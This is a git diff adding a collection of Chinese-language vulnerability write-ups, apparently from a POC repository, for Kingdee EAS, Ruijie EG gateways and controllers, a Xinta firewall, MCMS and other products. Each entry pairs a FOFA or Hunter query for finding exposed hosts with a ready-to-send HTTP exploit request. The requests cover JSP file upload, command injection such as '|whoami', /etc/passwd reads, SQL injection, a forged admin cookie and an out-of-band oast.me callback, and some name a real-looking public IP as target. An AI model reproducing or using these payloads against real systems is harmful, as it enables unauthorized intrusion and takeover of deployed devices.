+##漏洞来源 +- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw diff --git a/金蝶EAS-myUploadFile任意文件上传.md b/金蝶EAS-myUploadFile任意文件上传.md new file mode 100644 index 0000000..2bfde2a --- /dev/null +++ b/金蝶EAS-myUploadFile任意文件上传.md 
@@ -0,0 +1,34 @@ + +## 金蝶EAS myUploadFile任意文件上传 +![](https://mmbiz.qpic.cn/sz_mmbiz_png/Lc4ILVKo1g9cSbQc2icEW80fDeYIQ78YeAVSBibGsibyzialJJWOTNHIVt7dpyC4CDibfPeaI3Apn7jn4zHwhPpsWfg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1) + +## fofa +``` +app="Kingdee-EAS" +``` + +## POC +``` +POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx +Content-Length: 205 + +------WebKitFormBoundarySq4lDnabv8CwHfvx +Content-Disposition: form-data; name="myFile"; filename="test.jsp" +Content-Type: text/html + +<%out.println("test");%> +------WebKitFormBoundarySq4lDnabv8CwHfvx-- +``` + +jsp路径: + +http://127.0.0.1/easportal/buffalo/../test.jsp diff --git a/金蝶EAS存在appUtil.jsp命令执行漏洞.md b/金蝶EAS存在appUtil.jsp命令执行漏洞.md new file mode 100644 index 0000000..51357ad --- /dev/null +++ b/金蝶EAS存在appUtil.jsp命令执行漏洞.md 
@@ -0,0 +1,27 @@ +# 金蝶EAS存在appUtil.jsp命令执行漏洞 + +金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞,未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件,从而进行远程代码执行,控制服务器。 + +## fofa + +```javascript +app="Kingdee-EAS" +``` + +## poc + +```javascript +GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071131958.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/g7XvKIKPQf35z4IPt5i8iA diff --git a/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md b/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md new file mode 100644 index 0000000..2bd2575 --- /dev/null +++ b/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md 
@@ -0,0 +1,59 @@ + +## 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞 + +金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。 + +## fofa +``` +app="Kingdee-EAS" +``` + +## poc +``` +POST /plt_portal/setting/uploadLogo.action HTTP/1.1 +Host: +User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +X-Forwarded-For: +Content-Length: 632 +Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62 + +--04844569c7ca7d21a3ca115dca477d62 +Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top" + +ch +--04844569c7ca7d21a3ca115dca477d62 +Content-Disposition: form-data; name="dataCenter"; filename="dataCenter" + +xx +--04844569c7ca7d21a3ca115dca477d62 +Content-Disposition: form-data; name="insId"; filename="insId" + + +--04844569c7ca7d21a3ca115dca477d62 +Content-Disposition: form-data; name="type"; filename="type" + +top +--04844569c7ca7d21a3ca115dca477d62 +Content-Disposition: form-data; name="upload"; filename="test.jsp" +Content-Type: image/png + +test +--04844569c7ca7d21a3ca115dca477d62-- +``` +![3c4d1cec26f6b03e1876b02c2f7029d9](https://github.com/wy876/POC/assets/139549762/d7a2b831-852c-4488-bcd0-f9967d0e32a4) + +## 上传文件路径 +``` + +GET /portal/res/file/upload/xxx.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +X-Forwarded-For: +``` +![47f8b3b0cc61c63d9a0d2d2b54a602dc](https://github.com/wy876/POC/assets/139549762/8a80fc29-9d8e-4622-a465-3c3c423f1e57) diff --git a/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md b/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md new file mode 100644 index 0000000..6d2efce --- /dev/null +++ b/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md 
@@ -0,0 +1,51 @@ +## 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞 + +### 漏洞描述: +金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取服务器权限 + +### 漏洞影响: + +金蝶云星空企业版私有云、企业版私有云(订阅)、标准版私有云(订阅)三个产品V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁) + +### 网络测绘: +``` +app="金蝶云星空-管理中心" +``` + +### 漏洞复现: +登陆页面 +POC: +``` +POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 +Host: +Accept-Encoding: identity +Content-Length: 973 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */*Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061 + +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="dbId_v" + +. +--2ac719f8e29343df94aa4ab49e456061 + +Content-Disposition: form-data; name="FID" + +2022 +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx." +Content-Type: text/plain + +11 +--2ac719f8e29343df94aa4ab49e456061- +``` + +![image](https://github.com/wy876/POC/assets/139549762/0175cf8c-a854-4b15-800c-7a07e3d0306c) + +![image](https://github.com/wy876/POC/assets/139549762/7e731399-8257-448b-9ab4-2260d9c4dc43) + +### 文件上传路径 +``` +访问路径:/K3Cloud/uploadfiles/Test.ashx +``` diff --git a/金蝶云星空-CommonFileserver-任意文件读取漏洞.md b/金蝶云星空-CommonFileserver-任意文件读取漏洞.md new file mode 100644 index 0000000..462f205 --- /dev/null +++ b/金蝶云星空-CommonFileserver-任意文件读取漏洞.md @@ -0,0 +1,4 @@ +## 金蝶云星空 CommonFileserver 任意文件读取漏洞 +``` +GET /CommonFileServer/c:/windows/win.ini +``` diff --git a/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md b/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..8f92e2f --- /dev/null +++ b/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# 鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 博达下一代防火墙 + +# 三、资产测绘 ++ hunter`web.body="欢迎登录鑫塔第二代防火墙"` ++ 特征 + +![1701763927338-de770e3a-3043-4409-ab92-51fd20c0c231.png](./img/a95HTPaLIvNmPZAV/1701763927338-de770e3a-3043-4409-ab92-51fd20c0c231-964403.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/a95HTPaLIvNmPZAV/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-966135.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/a95HTPaLIvNmPZAV/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-569179.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/铭飞CMS-list接口存在SQL注入.md b/铭飞CMS-list接口存在SQL注入.md new file mode 100644 index 0000000..6fd8814 --- /dev/null +++ b/铭飞CMS-list接口存在SQL注入.md @@ -0,0 +1,12 @@ +## 铭飞CMS list接口存在SQL注入 + +## fofa +``` +body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js" +``` + +## poc +``` +http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271 +``` +![image](https://github.com/wy876/POC/assets/139549762/9f9df303-e0b5-4707-a3a8-228e97ab74a0) diff --git a/锁群管理系统存在逻辑缺陷漏洞.md b/锁群管理系统存在逻辑缺陷漏洞.md new file mode 100644 index 0000000..7a2d7d4 
--- /dev/null +++ b/锁群管理系统存在逻辑缺陷漏洞.md @@ -0,0 +1,20 @@ +# 锁群管理系统存在逻辑缺陷漏洞 +锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。 + +## fofa + +```javascript +title=="锁群管理系统 V2.0" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733070567966-134a04c6-0e40-46c3-8d09-f9367f8ddc62.png) + +## poc +cookie中添加如下内容,即可进入后台 + +```javascript +Cookie: ASP.NET_SessionId=evadd1jksrepp4gtbgockcbi; username=admin; power=1; powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; code=admin +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733070671832-06b3fd9e-545c-48f6-88e7-c8543c1a36b5.png) + diff --git a/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md b/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md new file mode 100644 index 0000000..4cfb6f2 --- /dev/null +++ b/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md @@ -0,0 +1,11 @@ +## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞 + +``` +POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1 +Host: +Accept: text/plain, */*; q=0.01 +Content-Disposition: form-data; name="file"; filename="111.php" +Content-Type: image/jpeg + + +``` diff --git a/锐捷AC无线控制器存在命令执行漏洞.md b/锐捷AC无线控制器存在命令执行漏洞.md new file mode 100644 index 0000000..6e24615 --- /dev/null +++ b/锐捷AC无线控制器存在命令执行漏洞.md 
@@ -0,0 +1,39 @@ +# 锐捷AC无线控制器存在命令执行漏洞 + +**一、漏洞简介** +锐捷AC无线控制器存在命令执行漏洞,攻击者可通过该漏洞执行任意命令 +**二、影响版本** + +锐捷AC无线控制器 + +**三、资产测绘** + +```plain +web.body="简网络,玩智分,无线移动体验 " +``` + +●登录![1711997786378-edcef547-10cd-420c-832e-a770238eb3f2.png](./img/SkGRDmmGc2Tiryjr/1711997786378-edcef547-10cd-420c-832e-a770238eb3f2-083457.png) + +![1711997819097-a4244fdc-1bef-41ee-b4ff-ed704db1c612.png](./img/SkGRDmmGc2Tiryjr/1711997819097-a4244fdc-1bef-41ee-b4ff-ed704db1c612-391171.png) + + + +![1711997764050-f8b07f3f-7a50-4784-b518-dde60cd3f693.png](./img/SkGRDmmGc2Tiryjr/1711997764050-f8b07f3f-7a50-4784-b518-dde60cd3f693-905629.png) + +**四、漏洞复现** + +```plain +POST /web_action.do HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +action=shell&command=ls +``` + +![1711997844450-ea706a57-d350-4ae3-9d94-65913aa37d36.png](./img/SkGRDmmGc2Tiryjr/1711997844450-ea706a57-d350-4ae3-9d94-65913aa37d36-776431.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md b/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md new file mode 100644 index 0000000..efbd055 --- /dev/null +++ b/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md 
@@ -0,0 +1,49 @@ +# 锐捷 EG易网关branch_import存在后台远程命令执行漏洞 + +**一、漏洞简介** +锐捷 EG易网关cli存在后台远程命令执行漏洞。 +**二、影响版本** + +```java +锐捷EG易网关 +``` + + +**三、资产测绘** + +```java +app="Ruijie-EG易网关" +``` + + +●登录页面 + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/q5gbx381pZqiSO5A/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-866006.png) + +# 四、漏洞复现 +1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/q5gbx381pZqiSO5A/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-331307.png) + +2. 通过上一步获取的cookie执行命令 + +```java +POST /itbox_pi/branch_import.php?a=branch_list HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=ihvlofd9j5bfjbikfrtng7p9f5; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 16 + +province=|whoami +``` + +![1714060183007-068368ef-b67b-4783-8549-487afc30bdcd.png](./img/q5gbx381pZqiSO5A/1714060183007-068368ef-b67b-4783-8549-487afc30bdcd-351882.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关branch_passw.php远程代码执行漏洞.md b/锐捷EG易网关branch_passw.php远程代码执行漏洞.md new file mode 100644 index 0000000..2c591a9 --- /dev/null +++ b/锐捷EG易网关branch_passw.php远程代码执行漏洞.md 
@@ -0,0 +1,62 @@ +# 锐捷EG易网关branch_passw.php远程代码执行漏洞 + +**一、漏洞简介** + +锐捷 EG易网关cli存在后台远程命令执行漏洞。 + + **二、影响版本** + +`锐捷EG易网关` +**三、资产测绘** + +`app="Ruijie-EG易网关"` +●登录页面 + + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/5-olKjEqA8Fof2za/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-027421.webp) + + +**四、漏洞复现** +1、通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/5-olKjEqA8Fof2za/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-244322.webp) + + +2、branch_passw.php执行whoami命令,写入web根目录test.txt文件,再访问test.txt文件得到回显。 + +```plain +POST /itbox_pi/branch_passw.php?a=set HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=e2iuc40kc25v8bosaf04ee7273; user=admin; helpKey=home_sys +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 24 + +pass=|whoami>../test.txt +``` + + + +3、写入文件地址 + +```plain +/test.txt +``` + + +![1711947576518-8aa155d7-86d7-4a78-9ecf-201b653a1f2c.png](./img/5-olKjEqA8Fof2za/1711947576518-8aa155d7-86d7-4a78-9ecf-201b653a1f2c-873932.png) + + + + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关cli存在后台远程命令执行漏洞.md b/锐捷EG易网关cli存在后台远程命令执行漏洞.md new file mode 100644 index 0000000..dcccdfd --- /dev/null +++ b/锐捷EG易网关cli存在后台远程命令执行漏洞.md 
@@ -0,0 +1,48 @@ +# 锐捷 EG易网关cli存在后台远程命令执行漏洞 + +**一、漏洞简介** +锐捷 EG易网关cli存在后台远程命令执行漏洞。 +**二、影响版本** + +```java +锐捷EG易网关 +``` + + +**三、资产测绘** + +```java +app="Ruijie-EG易网关" +``` + + +●登录页面 + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/1VOXlH5i8imJ_XHe/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-636269.png) + +# 四、漏洞复现 +1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/1VOXlH5i8imJ_XHe/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-408094.png) + +2. 通过上一步获取的cookie执行命令 + +```java +POST /cli.php?a=shell HTTP/1.1 +Host: +User-Agent: Go-http-client/1.1 +Content-Length: 24 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=j4rjrjdtilmhj824o98sv11r45; helpKey=home_sys;user=admin; +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip + +notdelay=true&command=id +``` + +![1711298769718-5281899e-c512-4cdb-b948-3ab79506923b.png](./img/1VOXlH5i8imJ_XHe/1711298769718-5281899e-c512-4cdb-b948-3ab79506923b-483591.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关download.php后台任意文件读取漏洞.md b/锐捷EG易网关download.php后台任意文件读取漏洞.md new file mode 100644 index 0000000..410348a --- /dev/null +++ b/锐捷EG易网关download.php后台任意文件读取漏洞.md 
@@ -0,0 +1,37 @@ +# 锐捷EG易网关download.php后台任意文件读取漏洞 + +**一、漏洞简介** + +锐捷EG易网关download.php后台任意文件读取漏洞 + +**二、影响版本** + +锐捷 EG易网关 +**三、资产测绘** +●登录页面 + +fofa:`app="Ruijie-EG易网关" ` + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/cg41HdOksJkEBK3T/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-093813.webp) + +![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/cg41HdOksJkEBK3T/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-161741.png) + + +**四、漏洞复现** +1通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/cg41HdOksJkEBK3T/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-847404.webp) + +2通过上一步获取的cookie执行 + +```plain +/download.php?a=read_txt&file=../../../../etc/passwd +``` + +![1711946009120-be7d5122-2ffc-4924-bd6c-4f4a8758dc0c.png](./img/cg41HdOksJkEBK3T/1711946009120-be7d5122-2ffc-4924-bd6c-4f4a8758dc0c-947085.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关export后台任意文件写入.md b/锐捷EG易网关export后台任意文件写入.md new file mode 100644 index 0000000..6dc80b8 --- /dev/null +++ b/锐捷EG易网关export后台任意文件写入.md 
@@ -0,0 +1,47 @@ +# 锐捷EG易网关export后台任意文件写入 + +**一、漏洞简介** + +锐捷EG易网关timeout.php后台任意文件读取漏洞 + +**二、影响版本** + +锐捷 EG易网关 +**三、资产测绘** +●登录页面 + +fofa:`app="Ruijie-EG易网关" ` + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/vMasNoG8fS1LMggm/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-994856.webp) + +![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/vMasNoG8fS1LMggm/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-136735.png) + + +**四、漏洞复现** +1通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/vMasNoG8fS1LMggm/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-475248.webp) + +2通过上一步获取的cookie执行命令 + +```plain +POST /vwan_pi/export.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: 117.40.253.197:4430 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 53 + +content=&filename=../../html/oo.php +``` + +![1714062627441-f53045aa-fcb5-455f-9c4c-611f093e6e5c.png](./img/vMasNoG8fS1LMggm/1714062627441-f53045aa-fcb5-455f-9c4c-611f093e6e5c-894916.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关login.php敏感信息泄露.md b/锐捷EG易网关login.php敏感信息泄露.md new file mode 100644 index 0000000..237a288 --- /dev/null +++ b/锐捷EG易网关login.php敏感信息泄露.md 
@@ -0,0 +1,33 @@ +# 锐捷EG易网关login.php敏感信息泄露 + +**一、漏洞简介** + +锐捷EG易网关login.php敏感信息泄露 + + **二、影响版本** + +`锐捷EG易网关` +**三、资产测绘** + +`app="Ruijie-EG易网关"` +●登录页面 + + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/3r1OYFKri8pFVNj6/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-740715.webp) + + +**四、漏洞复现** + +```plain +/login.php?a=version +``` + +![1714062137801-14ec6519-721d-482a-af0f-bd5e95ec7720.png](./img/3r1OYFKri8pFVNj6/1714062137801-14ec6519-721d-482a-af0f-bd5e95ec7720-406616.png) + + + + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关networksafe远程代码执行漏洞.md b/锐捷EG易网关networksafe远程代码执行漏洞.md new file mode 100644 index 0000000..f261820 --- /dev/null +++ b/锐捷EG易网关networksafe远程代码执行漏洞.md 
@@ -0,0 +1,52 @@ +# 锐捷EG易网关networksafe远程代码执行漏洞 + +**一、漏洞简介** + +锐捷 EG易网关cli存在后台远程命令执行漏洞。 + + **二、影响版本** + +`锐捷EG易网关` +**三、资产测绘** + +`app="Ruijie-EG易网关"` +●登录页面 + + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/95uANgjLfxI8FBL-/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-688088.webp) + + +**四、漏洞复现** +1、通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/95uANgjLfxI8FBL-/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-937391.webp) + +```plain +POST /itbox_pi/networksafe.php?a=set HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: 117.40.253.197:4430 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 23 + +bandwidth=|id >nice.txt +``` + +![1714062988720-d555b428-cc56-4327-8549-75c4e54bcf23.png](./img/95uANgjLfxI8FBL-/1714062988720-d555b428-cc56-4327-8549-75c4e54bcf23-448577.png) + +写入文件地址 + +```plain +/itbox_pi/nice.txt +``` + +![1714063009386-90ee202d-ad27-463e-8bd7-d83f66ef9d7a.png](./img/95uANgjLfxI8FBL-/1714063009386-90ee202d-ad27-463e-8bd7-d83f66ef9d7a-378601.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md b/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md new file mode 100644 index 0000000..d3a30c4 --- /dev/null +++ b/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md 
@@ -0,0 +1,31 @@ +# 锐捷 EG易网关phpinfo.view.php 信息泄露漏洞 + +**一、漏洞简介** + +锐捷 EG易网关存在未经身份验证获取敏感信息 + +**二、影响版本** +锐捷EG易网关 + +**三、资产测绘** +app="Ruijie-EG易网关" + +●登录页面 + + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/uLGTd_9BkwaR0Vvx/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-535279.webp) + + +**四、漏洞复现** + +```plain +/tool/view/phpinfo.view.php +``` + + + + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关timeout.php后台任意文件读取漏洞.md b/锐捷EG易网关timeout.php后台任意文件读取漏洞.md new file mode 100644 index 0000000..9110e91 --- /dev/null +++ b/锐捷EG易网关timeout.php后台任意文件读取漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷EG易网关timeout.php后台任意文件读取漏洞 + +**一、漏洞简介** + +锐捷EG易网关timeout.php后台任意文件读取漏洞 + +**二、影响版本** + +锐捷 EG易网关 +**三、资产测绘** +●登录页面 + +fofa:`app="Ruijie-EG易网关" ` + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/yxrLThOg1twrBoJM/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-724511.webp) + +![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/yxrLThOg1twrBoJM/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-662596.png) + + +**四、漏洞复现** +1通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/yxrLThOg1twrBoJM/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-386082.webp) + +2通过上一步获取的cookie执行命令 + +```plain +POST /system_pi/timeout.php?a=getFile HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 22 + +fileName=../etc/passwd +``` + +![1714062449229-3cce8ba1-8f09-4704-bcf3-73117674ac5a.png](./img/yxrLThOg1twrBoJM/1714062449229-3cce8ba1-8f09-4704-bcf3-73117674ac5a-281506.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md b/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md new file mode 100644 index 0000000..3928408 --- /dev/null +++ b/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md 
